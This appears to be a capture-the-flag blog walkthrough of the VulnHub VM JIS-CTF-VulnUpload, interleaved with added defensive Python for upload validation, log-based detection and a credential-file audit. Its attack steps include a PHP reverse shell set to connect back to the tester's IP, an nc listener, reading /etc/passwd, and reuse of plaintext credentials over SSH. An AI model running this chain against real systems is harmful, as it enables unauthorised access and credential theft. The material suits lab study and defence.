VM - Cracking JIS-CTF-VulnUpload-CTF01

Posted by 青蛙愛輪滑 on 2019-04-13

This post records my penetration-testing walkthrough of JIS-CTF-VulnUpload-CTF01. The test VM comes from www.vulnhub.com.
Blog series: CTF-oriented VM cracking series
Download link: JIS-CTF-VulnUpload-CTF01

13 April 2019, 19:19:03 [Original]

1. Official description

VM Name: JIS-CTF : VulnUpload

Difficulty: Beginner

Description: There are five flags on this machine. Try to find them. It takes 1.5 hour on average to find all flags.

Only working with VirtualBox
In my own testing the VM could not obtain an IP over DHCP under VMware.

2. Walkthrough

First, discover the target host's IP. My own IP is 192.168.216.3; since the target is on the same subnet, scan it:

root@kali:~# netdiscover -r 192.168.216.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts                 
                                                                               
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180               
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.216.1   0a:00:27:00:00:18      1      60  Unknown vendor              
 192.168.216.2   08:00:27:eb:09:84      1      60  PCS Systemtechnik GmbH      
 192.168.216.4   08:00:27:3a:0a:0b      1      60  PCS Systemtechnik GmbH  

The target IP is 192.168.216.4. Next, scan its ports:

root@kali:~# nmap -p- 192.168.216.4
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-13 07:51 EDT
Nmap scan report for 192.168.216.4
Host is up (0.000077s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:3A:0A:0B (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 16.73 seconds

The scan shows two open ports on the target. Start with port 80: opening it in a browser shows the web interface.
Use dirb to brute-force directories:

root@kali:~# dirb http://192.168.216.4

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Apr 13 07:55:41 2019
URL_BASE: http://192.168.216.4/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.216.4/ ----
==> DIRECTORY: http://192.168.216.4/admin_area/                                                                                                                                              
==> DIRECTORY: http://192.168.216.4/assets/                                                                                                                                                  
==> DIRECTORY: http://192.168.216.4/css/                                                                                                                                                     
==> DIRECTORY: http://192.168.216.4/flag/                                                                                                                                                    
+ http://192.168.216.4/index.php (CODE:302|SIZE:1228)                                                                                                                                        
==> DIRECTORY: http://192.168.216.4/js/                                                                                                                                                      
+ http://192.168.216.4/robots.txt (CODE:200|SIZE:160)                                                                                                                                        
+ http://192.168.216.4/server-status (CODE:403|SIZE:301)                                                                                                                                     
                                                                                                                                                                                             
---- Entering directory: http://192.168.216.4/admin_area/ ----
+ http://192.168.216.4/admin_area/index.php (CODE:200|SIZE:224)                                                                                                                              
                                                                                                                                                                                             
---- Entering directory: http://192.168.216.4/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                             
---- Entering directory: http://192.168.216.4/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                             
---- Entering directory: http://192.168.216.4/flag/ ----
+ http://192.168.216.4/flag/index.html (CODE:200|SIZE:109)                                                                                                                                   
                                                                                                                                                                                             
---- Entering directory: http://192.168.216.4/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Sat Apr 13 07:55:49 2019
DOWNLOADED: 13836 - FOUND: 5

As hinted, dirb found five results. One path, named flag, stands out; visiting it in a browser gives the first flag:

The 1st flag is : {8734509128730458630012095}

The page source contains nothing else useful. Next, look at the admin_area directory: the page itself shows nothing obvious, so view its source.

The source reveals the second flag together with a username and password:

<!--	username : admin
	password : 3v1l_H@ck3r
	The 2nd flag is : {7412574125871236547895214}
-->

With these credentials, try logging in on the main page. The login succeeds, and the page returned is a file upload form.

First upload a few files as a test: both rar and doc files upload without complaint, which suggests no filtering is done. Next upload a PHP shell (in Kali the reverse shell is at /usr/share/webshells/php/php-reverse-shell.php).

# Change the following so that the shell connects back to the Kali IP
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.216.3';  // CHANGE THIS
$port = 4444;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
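
The upload form on this VM accepted rar, doc and php files alike. The following Python is an added example, not code from the VM or from this post, showing the server-side validation that would have rejected the shell upload: an extension allowlist, rejection of any executable extension anywhere in a double extension such as shell.php.jpg, a check that the file's leading bytes match the claimed type, a size limit, and a random stored name so the client never chooses the on-disk filename. The allowlist, magic-byte table and size limit are assumptions chosen for the example.

```python
import os
import secrets
from typing import Tuple

# Allowlisted extensions and the magic bytes their content must start with.
# Constructed for this example; a real deployment lists only the types the
# application genuinely needs.
ALLOWED_TYPES = {
    "pdf": (b"%PDF-",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "zip": (b"PK\x03\x04",),
}

# Extensions that must never reach a web-served directory, even as part of
# a double extension ("shell.php.jpg" is rejected because of the "php").
EXECUTABLE_EXTS = {"php", "phtml", "php3", "php4", "php5", "phar", "cgi", "pl", "sh"}

MAX_SIZE = 5 * 1024 * 1024  # 5 MiB, an assumed limit


def validate_upload(filename: str, content: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason) for a client-supplied filename and body.

    Order of checks: plain basename (no path components, no dotfiles),
    an extension is present, no extension component is executable, the
    final extension is allowlisted, the size is bounded, and the content's
    first bytes match the allowlisted type.
    """
    base = os.path.basename(filename)
    if base != filename or not base or base.startswith("."):
        return False, "invalid filename"
    parts = base.lower().split(".")
    if len(parts) < 2:
        return False, "missing extension"
    exts = parts[1:]
    if any(e in EXECUTABLE_EXTS for e in exts):
        return False, "executable extension"
    ext = exts[-1]
    if ext not in ALLOWED_TYPES:
        return False, f"extension .{ext} not allowed"
    if len(content) > MAX_SIZE:
        return False, "file too large"
    if not any(content.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        return False, "content does not match extension"
    return True, "ok"


def stored_name(filename: str) -> str:
    """Name to store an accepted file under: random token plus the validated extension.

    The client-supplied name is never used on disk, so an uploader cannot pick
    a name that a later request could turn into code execution.
    """
    ext = filename.rsplit(".", 1)[1].lower()
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    for name, body in [
        ("php-reverse-shell.php", b"<?php set_time_limit(0); ?>"),
        ("shell.php.jpg", b"\xff\xd8\xff\xe0"),
        ("fake.pdf", b"<?php echo 1; ?>"),
        ("report.pdf", b"%PDF-1.4\n%..."),
    ]:
        print(name, validate_upload(name, body))
```

Validation alone is not enough: the stored file should also live outside the document root (or in a directory where the web server has script execution disabled), because this VM's uploaded_files directory was both web-accessible and PHP-enabled, which is exactly what turned an upload into a shell.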

After uploading we don't know where the file was stored, so we need to find the path. dirb showed that a robots.txt exists, so check it:

User-agent: *
Disallow: /
Disallow: /backup
Disallow: /admin
Disallow: /admin_area
Disallow: /r00t
Disallow: /uploads
Disallow: /uploaded_files
Disallow: /flag

The uploaded_files directory is presumably where uploads are stored, but the page shows nothing and its source can't be viewed either. Capturing the request with a proxy tool also captures nothing, but it does show that the page does not redirect, which means this directory has no index.php. So try appending the original uploaded filename to the path: the page is reachable and returns an error message, meaning the file was accessed successfully.

Next, listen on port 4444 in Kali:

root@kali:~# nc -nvlp 4444
listening on [any] 4444 ...

Then visit the uploaded file in a browser:

http://192.168.216.4/uploaded_files/php-reverse-shell.php

The shell connects back (if it doesn't, check that the IP and port in the PHP file were set correctly before uploading):

root@kali:~# nc -nvlp 4444
listening on [any] 4444 ...
connect to [192.168.216.3] from (UNKNOWN) [192.168.216.4] 40384
Linux Jordaninfosec-CTF01 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 15:32:19 up 47 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ 
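
Seen from the web server's side, this whole chain leaves a clear trail in the access log: a burst of 404s from one client while dirb walks its word list, followed by a request for a .php file under /uploaded_files/. The following Python is an added example, not part of the original post, that runs two such detection rules over constructed Apache combined-format log lines: one flags any request for a script-like file under the upload directory (the uploaded_files path comes from the VM's robots.txt; a 200 there means the server ran user-supplied code), the other flags clients whose requests are mostly 404s. The log lines, thresholds and client IPs are constructed for the example.

```python
import re
from collections import Counter
from typing import Dict, List, Optional, Tuple

# Apache "combined" LogFormat parser (constructed regex; adjust for a custom LogFormat).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

UPLOAD_DIR = "/uploaded_files/"  # the VM's upload directory, as listed in its robots.txt
# Script-like extension anywhere in the name, so "shell.php.jpg" is caught too.
SCRIPT_EXT_RE = re.compile(r"\.(php\d?|phtml|phar)(\.|$)", re.IGNORECASE)

# Constructed sample log: a scanner at .3 probing 30 non-existent paths, a few
# real hits, a normal user at .10, then the shell being fetched from the upload dir.
SAMPLE_LOG = (
    [f'192.168.216.3 - - [13/Apr/2019:07:55:41 -0400] "GET /guess{i} HTTP/1.1" 404 291 "-" "Mozilla/4.0"'
     for i in range(30)]
    + [
        '192.168.216.3 - - [13/Apr/2019:07:55:45 -0400] "GET /admin_area/ HTTP/1.1" 200 224 "-" "Mozilla/4.0"',
        '192.168.216.3 - - [13/Apr/2019:07:55:46 -0400] "GET /flag/ HTTP/1.1" 200 109 "-" "Mozilla/4.0"',
        '192.168.216.3 - - [13/Apr/2019:07:55:47 -0400] "GET /robots.txt HTTP/1.1" 200 160 "-" "Mozilla/4.0"',
        '192.168.216.10 - - [13/Apr/2019:08:01:02 -0400] "GET /index.php HTTP/1.1" 302 1228 "-" "Mozilla/5.0"',
        '192.168.216.10 - - [13/Apr/2019:08:01:05 -0400] "POST /check_login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
        '192.168.216.10 - - [13/Apr/2019:08:01:20 -0400] "GET /uploaded_files/report.pdf HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
        '192.168.216.3 - - [13/Apr/2019:08:02:11 -0400] "GET /uploaded_files/php-reverse-shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
        '192.168.216.3 - - [13/Apr/2019:08:03:30 -0400] "GET /uploaded_files/shell.php.jpg?cmd=id HTTP/1.1" 200 61 "-" "Mozilla/5.0"',
        'this line is not in combined format and is skipped',
    ]
)


def parse(line: str) -> Optional[Dict[str, object]]:
    """Parse one combined-format line; None for lines that don't match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec: Dict[str, object] = m.groupdict()
    rec["status"] = int(m.group("status"))
    return rec


def find_script_requests_in_upload_dir(lines: List[str]) -> List[Tuple[str, str, int]]:
    """Rule 1: (ip, path, status) for every request of a script-like file under UPLOAD_DIR."""
    hits = []
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        path = str(rec["path"]).split("?", 1)[0]  # drop the query string
        if path.startswith(UPLOAD_DIR) and SCRIPT_EXT_RE.search(path):
            hits.append((str(rec["ip"]), path, int(rec["status"])))
    return hits


def find_scanner_ips(lines: List[str], min_requests: int = 20, min_404_ratio: float = 0.8) -> List[str]:
    """Rule 2: clients with at least min_requests requests of which >= min_404_ratio were 404s."""
    total: Counter = Counter()
    notfound: Counter = Counter()
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        total[rec["ip"]] += 1
        if rec["status"] == 404:
            notfound[rec["ip"]] += 1
    return sorted(ip for ip, n in total.items()
                  if n >= min_requests and notfound[ip] / n >= min_404_ratio)


if __name__ == "__main__":
    for hit in find_script_requests_in_upload_dir(SAMPLE_LOG):
        print("script served from upload dir:", hit)
    print("probable scanners:", find_scanner_ips(SAMPLE_LOG))
```

Rule 1 is the higher-value alert: a scanner is noise on any internet-facing host, but a 200 for a .php file under a user-writable directory means the upload control and the execution control have both failed, and the outbound connection that follows (here to port 4444) is the egress event a firewall or NetFlow rule should catch independently.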

We are running as www-data. Change to the web root:

$ cd /var/www/html
$ ls
admin_area
assets
check_login.php
css
flag
flag.txt
hint.txt
index.php
js
login.php
logout.php
robots.txt
uploaded_files
$ 

flag.txt exists but cannot be read; there is, however, a readable hint.txt:

$ cat flag.txt
cat: flag.txt: Permission denied
$ cat hint.txt
try to find user technawi password to read the flag.txt file, you can find it in a hidden file ;)

The 3rd flag is : {7645110034526579012345670}

Let's see which users exist:

$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
technawi:x:1000:1000:technawi,,,:/home/technawi:/bin/bash
mysql:x:111:118:MySQL Server,,,:/nonexistent:/bin/false

The user named technawi catches my attention. Let's look at the files this user owns:

$ find / -user technawi -type f 2>& 1 | grep -v "Permission" | grep -v "No such"
/etc/mysql/conf.d/credentials.txt
/var/www/html/flag.txt
/home/technawi/.bash_history
/home/technawi/.sudo_as_admin_successful
/home/technawi/.profile
/home/technawi/.bashrc
/home/technawi/.bash_logout

Two of this user's files stand out: /etc/mysql/conf.d/credentials.txt and /var/www/html/flag.txt

$ cat /etc/mysql/conf.d/credentials.txt
The 4th flag is : {7845658974123568974185412}

username : technawi
password : 3vilH@ksor

$ cat /var/www/html/flag.txt
cat: /var/www/html/flag.txt: Permission denied
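
The fourth flag falls out of a credential file that technawi owns but that any local account, including the www-data account the web shell runs as, can read. The following Python is an added example, not part of the original post, of the audit a defender would run to find that class of file before an attacker does: walk a tree, and report every regular file that both contains a credential-like marker and has read permission for group or other. It builds a constructed temporary tree mirroring the VM's layout (with a placeholder instead of the real password) so it runs offline; the marker list and the sample files are assumptions for the example.

```python
import os
import stat
import tempfile
from typing import List, Tuple

# Substrings that suggest a file holds secrets (constructed list; extend per environment).
SECRET_MARKERS = (b"password", b"passwd", b"secret", b"api_key", b"token")


def is_readable_by_others(path: str) -> bool:
    """True if the file's mode grants read to group or other."""
    return bool(os.stat(path).st_mode & (stat.S_IRGRP | stat.S_IROTH))


def looks_like_credentials(path: str, max_bytes: int = 64 * 1024) -> bool:
    """True if the first max_bytes contain any credential marker (case-insensitive)."""
    try:
        with open(path, "rb") as fh:
            head = fh.read(max_bytes).lower()
    except OSError:
        return False
    return any(marker in head for marker in SECRET_MARKERS)


def audit_tree(root: str) -> List[Tuple[str, str]]:
    """Return sorted (relative path, octal mode) for credential-like files readable beyond their owner."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = os.path.join(dirpath, name)
            if os.path.islink(p):
                continue  # symlinks are reported where their target lives
            if is_readable_by_others(p) and looks_like_credentials(p):
                mode = oct(stat.S_IMODE(os.stat(p).st_mode))
                findings.append((os.path.relpath(p, root), mode))
    return sorted(findings)


def demo() -> List[Tuple[str, str]]:
    """Build a constructed tree modelled on the VM and audit it."""
    root = tempfile.mkdtemp(prefix="audit_demo_")
    os.makedirs(os.path.join(root, "etc", "mysql", "conf.d"))
    os.makedirs(os.path.join(root, "home", "technawi"))
    cases = {
        # world-readable credential file: the finding we expect
        "etc/mysql/conf.d/credentials.txt": (b"username : technawi\npassword : <placeholder>\n", 0o644),
        # world-readable but no secrets: not reported
        "etc/mysql/conf.d/my.cnf": (b"[mysqld]\nbind-address=127.0.0.1\n", 0o644),
        "home/technawi/.bashrc": (b"# ~/.bashrc\n", 0o644),
        # holds a password but is owner-only: not reported
        "home/technawi/.netrc": (b"machine db login x password y\n", 0o600),
    }
    for rel, (body, mode) in cases.items():
        p = os.path.join(root, rel)
        with open(p, "wb") as fh:
            fh.write(body)
        os.chmod(p, mode)
    return audit_tree(root)


if __name__ == "__main__":
    for rel, mode in demo():
        print(f"{mode} {rel}")
```

On a real host the same walk over /etc, /home, /var/www and /opt, run from a low-privilege account, approximates what a web-shell operator sees; the fix for each finding is the usual one: move the secret out of a world-readable file, or chmod 600 it and have only the service that needs it run as its owner.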

Log in to the system with this username and password:

root@kali:~# ssh technawi@192.168.216.4
The authenticity of host '192.168.216.4 (192.168.216.4)' can't be established.
ECDSA key fingerprint is SHA256:ThPvIGqyDX2PSqt5JWHyy/J/Hy2hK5aVcpKTpkTKHQE.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.216.4' (ECDSA) to the list of known hosts.
technawi@192.168.216.4's password: 
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-72-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


Last login: Fri Apr 21 17:22:16 2017
technawi@Jordaninfosec-CTF01:~$ 

Now read the flag:

technawi@Jordaninfosec-CTF01:~$ cd /var/www/html/
technawi@Jordaninfosec-CTF01:/var/www/html$ cat flag.txt 
The 5th flag is : {5473215946785213456975249}

Good job :)

You find 5 flags and got their points and finish the first scenario....

With that, all five flags have been collected.
